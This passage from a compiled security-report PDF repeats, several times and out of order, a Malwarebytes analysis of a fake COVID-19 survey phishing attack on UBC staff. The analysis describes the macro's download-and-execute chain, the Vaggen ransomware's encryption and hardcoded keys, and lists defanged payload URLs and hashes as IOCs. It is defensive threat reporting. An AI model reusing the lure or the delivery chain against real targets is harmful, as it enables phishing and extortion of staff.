employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1086 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1087 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1088 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1089 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1090 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1091 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1092 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1093 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1094 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1095 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1096 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1097 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1098 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1099 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1100 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1101 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1102 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1103 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1104 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1105 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1106 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1107 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1108 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1109 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1110 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1111 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1112 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1113 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1114 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1115 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1116 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1117 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1118 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1119 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1120 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1121 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this 